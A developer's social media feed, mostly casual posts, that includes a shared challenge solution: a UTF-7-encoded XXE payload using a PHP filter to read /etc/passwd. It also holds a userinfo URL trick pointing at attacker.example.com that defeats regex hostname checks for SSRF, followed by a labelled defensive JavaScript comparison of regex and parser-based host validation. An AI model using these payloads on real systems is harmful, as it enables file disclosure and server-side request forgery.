martcl
martcl.bsky.social
Developer, CTF player and golang enjoyer.
Assuming this is possible, it is not a good idea. The rule of law will stagnate because it becomes demanding to bring in new changes and alter the status quo, e.g. things that were illegal in 1972 that are legal now. We need humans helping humans here.
November 26, 2025 at 9:18 AM
NRK launched "Kula" and it inspired me to look at this problem again. The solution is a blend of the best from my earlier program, lessons from Tommy Odland's solution and a YouTube video about triangle search.
November 16, 2025 at 11:39 AM
<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4
March 22, 2025 at 8:12 PM
Sorry if I'm interpreting wrong or ruining the competition. I really enjoyed the article and learned something new! 👑 My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a bsky post!
March 22, 2025 at 8:12 PM
I interpret the words "post your solution" and "reply" as meaning it's OK to share a solution publicly before the competition is finished. Just feels a bit strange 😅
March 22, 2025 at 7:57 PM
With "reply", do you mean comment our solution here?
March 22, 2025 at 7:48 PM
Better to just use the browser. No updates;)
March 11, 2025 at 6:59 PM
… Depending on how the function is used, you would need to add one more colon to my original URL to get an SSRF.
March 5, 2025 at 2:16 PM
This is just URL parsing. The vuln comes from how you use the function, I guess. SSRF could definitely become an issue here since the hostname assumption is wrong.
March 5, 2025 at 2:12 PM
regex <3 `https://example.com:pass@attacker.example.com`
March 4, 2025 at 10:28 PM
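The hostname confusion discussed in the March 4-5 posts above, as an added example that is not from the posts or the function they refer to (that function is not shown on this page). `naiveHost`, `isAllowed` and the allowlist are hypothetical names and constructed values; the comparison uses the WHATWG `URL` parser built into Node.js and browsers.

```javascript
// Added example: regex-based host extraction vs. a real URL parser.
// naiveHost, isAllowed and ALLOWED_HOSTS are hypothetical, not from the posts.
const ALLOWED_HOSTS = new Set(["example.com"]); // constructed allowlist

// Hypothetical regex extractor: everything after "//" up to the first
// ":", "/", "?" or "#". It has no notion of the userinfo part of a URL.
function naiveHost(url) {
  const m = /^https?:\/\/([^:\/?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Parser-based check: take the host from the WHATWG parser and reject any
// URL carrying credentials, since userinfo is what misleads the regex.
function isAllowed(url) {
  let u;
  try {
    u = new URL(url);
  } catch {
    return false; // unparseable input is rejected
  }
  if (u.protocol !== "https:") return false;
  if (u.username !== "" || u.password !== "") return false;
  return ALLOWED_HOSTS.has(u.hostname); // hostname excludes the port
}

// First entry is the URL from the post; the rest are constructed samples.
const samples = [
  "https://example.com:pass@attacker.example.com",
  "https://example.com/path",
  "https://example.com:8443/path",
  "https://user@example.com/",
];

// One row per sample: what the regex believes vs. what a client connects to.
function report() {
  return samples.map((s) => ({
    url: s,
    regexHost: naiveHost(s),
    parsedHost: new URL(s).hostname,
    allowed: isAllowed(s),
  }));
}

console.table(report());
```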